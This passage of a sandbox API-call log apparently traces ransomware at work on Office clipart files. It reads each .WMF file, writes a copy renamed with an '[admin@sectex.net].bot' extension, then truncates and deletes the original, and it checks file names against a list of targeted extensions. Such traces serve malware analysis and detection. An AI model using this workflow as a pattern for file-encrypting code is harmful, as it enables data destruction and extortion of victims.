	[0143.173] CloseHandle (hObject=0x388) returned 1
	[0143.174] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.174] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.176] CloseHandle (hObject=0x3b4) returned 1
	[0143.176] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.176] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf")) returned 1
	[0143.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63
	[0143.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63
	[0143.177] lstrlenW (lpString=".doc") returned 4
	[0143.177] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.177] lstrlenW (lpString=".docx") returned 5
	[0143.177] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.177] lstrlenW (lpString=".pdf") returned 4
	[0143.177] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.177] lstrlenW (lpString=".xls") returned 4
	[0143.177] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.177] lstrlenW (lpString=".xlsx") returned 5
	[0143.177] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.177] lstrlenW (lpString=".ppt") returned 4
	[0143.177] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63
	[0143.177] lstrlenW (lpString=".zip") returned 4
	[0143.177] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.177] lstrlenW (lpString=".rar") returned 4
	[0143.177] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.177] lstrlenW (lpString=".bz2") returned 4
	[0143.177] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.177] lstrlenW (lpString=".7z") returned 3
	[0143.177] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63
	[0143.177] lstrlenW (lpString=".dbf") returned 4
	[0143.177] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63
	[0143.177] lstrlenW (lpString=".1cd") returned 4
	[0143.177] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63
	[0143.177] lstrlenW (lpString=".jpg") returned 4
	[0143.177] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63
	[0143.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63
	[0143.178] lstrlenW (lpString=".doc") returned 4
	[0143.178] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.178] lstrlenW (lpString=".docx") returned 5
	[0143.178] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.178] lstrlenW (lpString=".pdf") returned 4
	[0143.178] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.178] lstrlenW (lpString=".xls") returned 4
	[0143.178] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.178] lstrlenW (lpString=".xlsx") returned 5
	[0143.178] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.178] lstrlenW (lpString=".ppt") returned 4
	[0143.178] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63
	[0143.178] lstrlenW (lpString=".zip") returned 4
	[0143.178] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.178] lstrlenW (lpString=".rar") returned 4
	[0143.178] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.178] lstrlenW (lpString=".bz2") returned 4
	[0143.178] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.178] lstrlenW (lpString=".7z") returned 3
	[0143.178] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63
	[0143.178] lstrlenW (lpString=".dbf") returned 4
	[0143.178] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63
	[0143.178] lstrlenW (lpString=".1cd") returned 4
	[0143.178] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63
	[0143.178] lstrlenW (lpString=".jpg") returned 4
	[0143.178] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.179] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.179] lstrlenW (lpString="BS00200_.WMF") returned 12
	[0143.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.179] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=3104) returned 1
	[0143.179] CloseHandle (hObject=0x3b4) returned 1
	[0143.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf")) returned 0x20
	[0143.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.180] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.180] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.180] GetLastError () returned 0x0
	[0143.180] ReadFile (in: hFile=0x3b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xc20, lpOverlapped=0x0) returned 1
	[0143.182] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xc30, lpOverlapped=0x0) returned 1
	[0143.183] ReadFile (in: hFile=0x3b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.183] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.183] SetEndOfFile (hFile=0x388) returned 1
	[0143.183] CloseHandle (hObject=0x388) returned 1
	[0143.183] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.183] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.186] CloseHandle (hObject=0x3b4) returned 1
	[0143.186] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.213] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf")) returned 1
	[0143.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63
	[0143.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63
	[0143.245] lstrlenW (lpString=".doc") returned 4
	[0143.245] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.245] lstrlenW (lpString=".docx") returned 5
	[0143.245] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.245] lstrlenW (lpString=".pdf") returned 4
	[0143.245] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.245] lstrlenW (lpString=".xls") returned 4
	[0143.245] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.245] lstrlenW (lpString=".xlsx") returned 5
	[0143.245] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.245] lstrlenW (lpString=".ppt") returned 4
	[0143.245] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63
	[0143.245] lstrlenW (lpString=".zip") returned 4
	[0143.245] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.245] lstrlenW (lpString=".rar") returned 4
	[0143.245] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.245] lstrlenW (lpString=".bz2") returned 4
	[0143.245] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.245] lstrlenW (lpString=".7z") returned 3
	[0143.245] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63
	[0143.245] lstrlenW (lpString=".dbf") returned 4
	[0143.245] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63
	[0143.245] lstrlenW (lpString=".1cd") returned 4
	[0143.245] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63
	[0143.246] lstrlenW (lpString=".jpg") returned 4
	[0143.246] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63
	[0143.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63
	[0143.246] lstrlenW (lpString=".doc") returned 4
	[0143.246] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.246] lstrlenW (lpString=".docx") returned 5
	[0143.246] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.246] lstrlenW (lpString=".pdf") returned 4
	[0143.246] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.246] lstrlenW (lpString=".xls") returned 4
	[0143.246] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.246] lstrlenW (lpString=".xlsx") returned 5
	[0143.246] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.246] lstrlenW (lpString=".ppt") returned 4
	[0143.246] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63
	[0143.246] lstrlenW (lpString=".zip") returned 4
	[0143.246] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.246] lstrlenW (lpString=".rar") returned 4
	[0143.246] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.246] lstrlenW (lpString=".bz2") returned 4
	[0143.246] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.247] lstrlenW (lpString=".7z") returned 3
	[0143.247] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63
	[0143.247] lstrlenW (lpString=".dbf") returned 4
	[0143.247] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63
	[0143.247] lstrlenW (lpString=".1cd") returned 4
	[0143.247] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63
	[0143.247] lstrlenW (lpString=".jpg") returned 4
	[0143.247] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.247] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.247] lstrlenW (lpString="BS00439_.WMF") returned 12
	[0143.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.282] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2052) returned 1
	[0143.282] CloseHandle (hObject=0x2a0) returned 1
	[0143.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf")) returned 0x20
	[0143.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.314] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.314] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.314] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0143.314] GetLastError () returned 0x0
	[0143.314] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x804, lpOverlapped=0x0) returned 1
	[0143.349] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x810, lpOverlapped=0x0) returned 1
	[0143.349] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.349] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.350] SetEndOfFile (hFile=0x3c4) returned 1
	[0143.377] CloseHandle (hObject=0x3c4) returned 1
	[0143.377] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.377] SetEndOfFile (hFile=0x388) returned 1
	[0143.379] CloseHandle (hObject=0x388) returned 1
	[0143.379] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.380] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf")) returned 1
	[0143.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63
	[0143.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63
	[0143.380] lstrlenW (lpString=".doc") returned 4
	[0143.380] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.380] lstrlenW (lpString=".docx") returned 5
	[0143.380] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.380] lstrlenW (lpString=".pdf") returned 4
	[0143.380] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.380] lstrlenW (lpString=".xls") returned 4
	[0143.380] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.380] lstrlenW (lpString=".xlsx") returned 5
	[0143.380] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.381] lstrlenW (lpString=".ppt") returned 4
	[0143.381] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63
	[0143.381] lstrlenW (lpString=".zip") returned 4
	[0143.381] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.381] lstrlenW (lpString=".rar") returned 4
	[0143.381] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.381] lstrlenW (lpString=".bz2") returned 4
	[0143.381] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.381] lstrlenW (lpString=".7z") returned 3
	[0143.381] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63
	[0143.381] lstrlenW (lpString=".dbf") returned 4
	[0143.381] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63
	[0143.381] lstrlenW (lpString=".1cd") returned 4
	[0143.381] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63
	[0143.381] lstrlenW (lpString=".jpg") returned 4
	[0143.381] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63
	[0143.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63
	[0143.381] lstrlenW (lpString=".doc") returned 4
	[0143.381] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.381] lstrlenW (lpString=".docx") returned 5
	[0143.381] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.381] lstrlenW (lpString=".pdf") returned 4
	[0143.381] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.381] lstrlenW (lpString=".xls") returned 4
	[0143.381] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.381] lstrlenW (lpString=".xlsx") returned 5
	[0143.381] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.381] lstrlenW (lpString=".ppt") returned 4
	[0143.382] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63
	[0143.382] lstrlenW (lpString=".zip") returned 4
	[0143.382] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.382] lstrlenW (lpString=".rar") returned 4
	[0143.382] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.382] lstrlenW (lpString=".bz2") returned 4
	[0143.382] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.382] lstrlenW (lpString=".7z") returned 3
	[0143.382] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63
	[0143.382] lstrlenW (lpString=".dbf") returned 4
	[0143.382] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63
	[0143.382] lstrlenW (lpString=".1cd") returned 4
	[0143.382] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63
	[0143.382] lstrlenW (lpString=".jpg") returned 4
	[0143.382] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.382] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.382] lstrlenW (lpString="BS00445_.WMF") returned 12
	[0143.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.383] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=3796) returned 1
	[0143.383] CloseHandle (hObject=0x388) returned 1
	[0143.383] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf")) returned 0x20
	[0143.383] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.383] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.383] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0143.384] GetLastError () returned 0x0
	[0143.384] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xed4, lpOverlapped=0x0) returned 1
	[0143.417] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xee0, lpOverlapped=0x0) returned 1
	[0143.418] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.419] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.419] SetEndOfFile (hFile=0x3c4) returned 1
	[0143.419] CloseHandle (hObject=0x3c4) returned 1
	[0143.419] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.419] SetEndOfFile (hFile=0x388) returned 1
	[0143.421] CloseHandle (hObject=0x388) returned 1
